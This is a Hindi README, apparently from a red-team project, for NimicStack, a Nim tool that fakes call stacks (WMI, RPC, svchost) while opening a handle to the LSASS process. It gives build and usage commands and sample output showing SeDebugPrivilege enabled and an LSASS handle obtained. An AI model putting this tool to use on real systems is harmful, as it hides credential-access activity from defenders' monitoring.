
NimicStack, वैध प्रोग्रामों की नकल करने के लिए Call Stack Spoofing तकनीक का शुद्ध Nim कार्यान्वयन है।
NimicStack, वैध प्रोग्रामों की नकल करने के लिए कॉल स्टैक स्पूफिंग (Call Stack Spoofing) तकनीक का शुद्ध Nim कार्यान्वयन है। यह पूरी परियोजना WithSecure Labs द्वारा साझा किए गए PoC पर आधारित है।
आप स्रोत कोड को निम्नलिखित कमांड से सीधे संकलित कर सकते हैं:
nim c -d=mingw --app=console --cpu=amd64 -o:NimicStack.exe .\Main.nim
यदि आपको "cannot open file" त्रुटि मिलती है, तो आपको आवश्यक निर्भरताएँ (dependencies) भी स्थापित करनी चाहिए:
nimble install ptr_math winim
संदर्भ परियोजना की तरह, NimicStack LSASS प्रक्रिया खोलते समय तीन उदाहरण कॉल स्टैक — WMI, RPC और Svchost — की नकल कर सकता है।
.\NimicStack.exe <--wmi, --rpc, --svchost>
WMI कॉल स्टैक की नकल के लिए उदाहरण आउटपुट:
PS C:\Users\test\Desktop\NimicStack> .\NimicStack.exe --wmi
███╗ ██╗██╗███╗ ███╗██╗ ██████╗███████╗████████╗ █████╗ ██████╗██╗ ██╗
████╗ ██║██║████╗ ████║██║██╔════╝██╔════╝╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝
██╔██╗ ██║██║██╔████╔██║██║██║ ███████╗ ██║ ███████║██║ █████╔╝
██║╚██╗██║██║██║╚██╔╝██║██║██║ ╚════██║ ██║ ██╔══██║██║ ██╔═██╗
██║ ╚████║██║██║ ╚═╝ ██║██║╚██████╗███████║ ██║ ██║ ██║╚██████╗██║ ██╗
╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝╚═╝ ╚═════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝
@R0h1rr1m
[+] wmi frame is selected!
[+] Required libraries were imported for return address calculation!
[+] SeDebugPrivilege is enabled!
[+] Fake Call Stack was created!
[+] Trying to find LSASS pid...
[+] LSASS pid found!: 756
[+] Registers were set for NtOpenProcess call!
[+] VEH callback was set for the suspended thread!
[+] Thread is resuming...
[+] VEH callback was called!
[+] Redirecting thread to RtlExitUserThread...
[+] Spoof is successful! Handle is 356
[+] You can check the spoofed call stack from Sysmon!
और इस कॉल के लिए Sysmon आउटपुट:

केवल अधिकृत सुरक्षा परीक्षण के लिए। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इस टूल का दुरुपयोग करना अवैध है।